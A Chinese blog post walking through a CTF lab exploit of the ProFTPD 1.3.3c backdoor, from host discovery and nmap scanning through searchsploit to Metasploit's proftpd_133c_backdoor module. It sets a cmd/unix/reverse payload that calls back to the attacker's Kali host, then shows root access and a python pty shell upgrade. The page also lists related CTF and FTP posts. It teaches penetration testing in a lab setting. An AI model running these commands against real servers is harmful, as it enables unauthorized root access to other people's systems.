ctf图文讲解-FTP后门服务利用

最新推荐文章于 2023-04-12 19:44:31 发布
最新推荐文章于 2023-04-12 19:44:31 发布
阅读量602 收藏 4
点赞数 2
分类专栏: 笔记 ctf 文章标签: linux 安全 shell python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45441727/article/details/114932421
版权
笔记 同时被 2 个专栏收录
72 篇文章 16 订阅
订阅专栏
ctf
9 篇文章 4 订阅
订阅专栏

首先进行靶机发现

netdiscover -r 靶机IP网段

在这里插入图片描述

发现靶机,对靶机进行操作系统版本扫描

nmap -sV 靶机IP

在这里插入图片描述

发现21端口版本号为 ProFTPD 1.3.3c

通过searchsploit查看对应版本号漏洞文件

searchsploit ProFTPD 1.3.3c

在这里插入图片描述
查看文件

cat /usr/share/exploitdb/exploits/linux/remote/15662.txt

在这里插入图片描述
在这里插入图片描述
很多情况下我们可以通过这些文件来判断如何去进行攻击,kail大多数都是把攻击方法写进文件,然后我们就可以通过读取文件信息来进行下一步。

(英语真的很重要)

进入msf

msf > 
msf > search ProFTPD 1.3.3c

在这里插入图片描述
使用exploit/unix/ftp/proftpd_133c_backdoor 这个模块backdoor是后门的意思

使用并配置模块

msf > use exploit/unix/ftp/proftpd_133c_backdoor 
msf exploit(unix/ftp/proftpd_133c_backdoor) >

查看payloads(有效载荷,有效负荷,有效载重)

msf exploit(unix/ftp/proftpd_133c_backdoor) > show payloads
msf exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/reverse
payload => cmd/unix/reverse

在这里插入图片描述

填写IP

msf exploit(unix/ftp/proftpd_133c_backdoor) > set rhost 靶机IP
rhost => 靶机IP
msf exploit(unix/ftp/proftpd_133c_backdoor) > set lhost kail的IP
lhost => kail的IP

在这里插入图片描述

运行

msf exploit(unix/ftp/proftpd_133c_backdoor) > exploit
id	#查看当前用户权限
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)

在这里插入图片描述

优化界面

python -c "import pty;pty.spawn('/bin/bash')"        
root@vtcsec:/#

在这里插入图片描述
发现我们已经是root了,直接找flag吧。
如果不是root需要提权请看这个https://blog.csdn.net/weixin_45441727/article/details/114643796

Marx_Otto
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF之流量分析之密码文件
shy的博客
08-11 932
深夜里,Hack偷偷的潜入了某公司的内网,趁着深夜偷走了公司的秘密文件,公司的网络管理员通过通过监控工具成功的截取Hack入侵时数据流量,但是却无法分析出Hack到底偷走了什么机密文件,你能帮帮管理员分析出Hack到底偷走了什么机密文件吗?只能导出http流量内的文件,选中想要保存的文件,点击save,即可保存成功,但是保存的文件中还有大量的流量数据包,需要手工删减。6、如果有流量,就追踪TCP流,然后将默认数据保存格式为ASCII,需要修改为原始数据,选择另存为。2、统计-协议分级,发现存在FTP流量。
小白学习CTF第四天-FTP服务渗透
bbhh1139的博客
04-12 592
服务安全FTP服务 FTP介绍 信息探测 具体的操作与之前都是一样的: 发现漏洞 使用searchsploit 可以查看敏感文件: 使用metasploit进行溢出 终端输入msfconsole search ProFTPD 1.3.3c 使用里面的敏感文件: 查看options需要添加的内容 设置对应的参数: 再次查看是否添加成功: 使用exploit进行溢出: 我们...
渗透测试CTF-流量分析
保持微笑的博客
11-03 3891
渗透测试CTF-流量分析
CTF逆向-[FlareOn1]Javascrap-web逆向中发现的php后门的逐步解析方式,得到后门的密码
serfend's blog
05-03 1742
CTF逆向-[FlareOn1]Javascrap-web逆向中发现的php后门的逐步解析方式,得到后门的密码 来源:https://buuoj.cn/ 内容: 附件:链接:https://pan.baidu.com/s/1N2bN_TueCtuqTkNlE3tKeA?pwd=hqxm 提取码:hqxm 答案:[email protected] 总体思路 文件夹名字是c2,猜测是后门,故发现html文件中存在异常include 查看include的文件发现php代码 解析代码发
CTF后门入侵系统(攻防世界)
走在成功路上的博客
09-22 1983
CTF后门入侵系统php://filter的妙用测试题目测试题目二 php://filter的妙用 php://filter是php中特有协议流,"中间流"来处理其他流,就比如可以用:post请求通过base64将php源码编译并输出; localhost:80/index.php?php://filter/write=convert.base64-decode/resource=index...
msf攻击FTP 服务.docx
04-26
通过图文并茂的方式详细描述了利用msf框架进行ftp攻击的过程,文中包含了命令和步骤,很详细,给初学者作为参考。
msf-ftp
西部壮仔的博客
03-16 380
use auxiliary/scanner/ftp/ftp_version 收集ftp的版本信息 use auxiliary/scanner/ftp/anonymous 判断是否可以匿名登陆 use auxiliary/scanner/ftp/ftp_login ftp账号密码破解
应急响应-CTF-BUUCTF-后门查杀 1
theenderofroot的博客
04-12 1204
明显的一个文件包含漏洞代码,可以GET传参自定义文件名并且自动拼接php后缀,但是没有flag。2、下载下来是一个网站源码,看来是一道代码审计题,直接把文件夹放入PhpStorm中。5、那么就只能先看include文件夹了,里面还有个include.php,重点审查。4、 uploud文件夹里有个压缩包,打开看发现是一个很正常的word文档。发现$pass变量,内容好像是MD5加密字符串,包上flag试一试。3、先看web.php,这个文件的名字有点可疑。1、快速过一下题目,下载压缩包。
CTF--8.FTP服务后门利用
woo233的博客
09-13 878
FTP是File Transfer Protocol(文件传输协议)的英文简称,而中文简称为“文传协议”。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(Application)。基于不同的操作系统有不同的FTP应用程序,而所有这些应用程序都遵守同一种协议以传输文件。在FTP的使用当中,用户经常遇到两个概念:"下载”(Download)和上传(Upload)。"下载"文件就是从远程主机拷贝文件至自己的计算机上,"上传"文件就是将文件从自己的计算机中拷贝至远程主机上。
访问FTP 报错:打开FTP服务器上的文件夹时发生错误。请检查是否有权限访问该文件夹 550 No such file or directory
u012817876的博客
04-02 1万+
在此电脑 地址栏输入 ftp://地址 ,一直弹出 在网上百度 各种设置都没有用 最后,把ftp://地址 改成 \\地址 就连上了。。。。。
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
ctf-tools-linux-master.zip
06-22
ctf集成工具包-linux
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
ctf拼图例题-puzzle
04-13
关于puzzle例题的原题资源,搭配文章使用更配噢 https://editor.csdn.net/md/?articleId=124139016
CTF-RSA-tool-master.zip
01-19
针对CTF中CRYPTO的RSA工具
linux用户ftp失败,linux常见ftp错误代码
weixin_29341747的博客
04-28 2473
说明:配置的ftp无法连接,会返回错误代码。具体错误代码又代表了什么呢。具体:Connect 连接被拒绝: 可能原因是vsftpd服务没被启动530 Permission denied: 可能原因是userlist_enable=YES并且/etc/vsftpd/user_list中包含要登录的ftp用户名 即user_list禁止了该用户的登录、或者可能是没有指定userlist_file=/e...
CTF之Tr0ll1 靶机渗透(FTP匿名登录 SSH爆破)
afei001
12-06 620
目录 练习环境 1.发现靶机,端口扫描 2.网站探测 3.对端口进行全扫描 4.FTP匿名登录,探测信息 5.尝试爆破SSH 6.内核漏洞提权,拿下flag 总结 练习环境 攻击机:kali 靶机:Tr0ll: 1 下载地址:https://download.vulnhub.com/tr0ll/Tr0ll.rar 1.发现靶机,端口扫描 root@kali:~# nmap -sV -O 100.100.100.14 Starting Nma...
windows无法访问FTP服务器的各种报错解决
热门推荐
平庸
03-30 5万+
总结所有的windows无法访问FTP服务器共享问题,并将其解决方法列出。
ftp服务的配置及常见报错
weixin_43697701的博客
02-12 817
1、定义 ftp:// ##文件传输协议 2、布置服务 vim /etc/sysconfig/selinux SELINUX=disabled reboot getenforce Disabled 配置yum源 安装lptf和vsftpd 打开防火墙 配置防火墙 yum install vsftpd -y systemctl start vsftpd systemctl ...
ctfhub-git泄露stash
最新发布
09-13
根据引用和引用提供的信息,你可以尝试使用GitHack和dirsearch工具来扫描和利用ctfhub-git的泄露。首先,进入GitHack文件夹,执行命令"python GitHack.py ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值